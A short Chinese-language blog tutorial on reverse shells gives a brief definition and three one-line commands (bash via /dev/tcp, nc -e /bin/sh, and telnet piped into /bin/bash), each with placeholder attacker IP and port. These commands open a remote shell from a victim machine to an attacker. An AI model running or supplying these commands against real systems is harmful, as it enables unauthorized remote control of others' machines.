简易的反弹shell

字数统计: 253字   |   阅读时长≈ 1分

0X00 什么是反弹shell

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

0X01 几种常见的反弹shell

首先用攻击机监听端口

UzFLhd.png

1.bash反弹shell

1
bash -i >& /dev/tcp/ip地址/端口号 0>&1

UzknBT.png

攻击机ip地址

image-20200725105650930

受害机ip地址

UzkDCd.png

受害机输入

UzkfUg.png

此时在攻击机上使用ifconfig可以看到是受害机的ip地址,说明拿到了受害机的控制权

2.nc反弹shell

1
nc -e /bin/sh ip地址 端口号

UzAEIe.png

UzAKMt.md.png

3. telnet反弹

1
telnet 攻击主机ip 端口号 | /bin/bash

UzEiSs.png

UzEAO0.png

telnet链接攻击机执行一些命令后,会回显到受害机上

0x02 总结

shell反弹还有很多通过脚本语言这没有写出,只写了一些简单的反弹shell的方式。

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要涉及技术:
Java后端开发、网络安全、
服务器配置、JAVA安全的学习、Linux

联系QQ:1170516014

一个19级计科专业的小菜鸡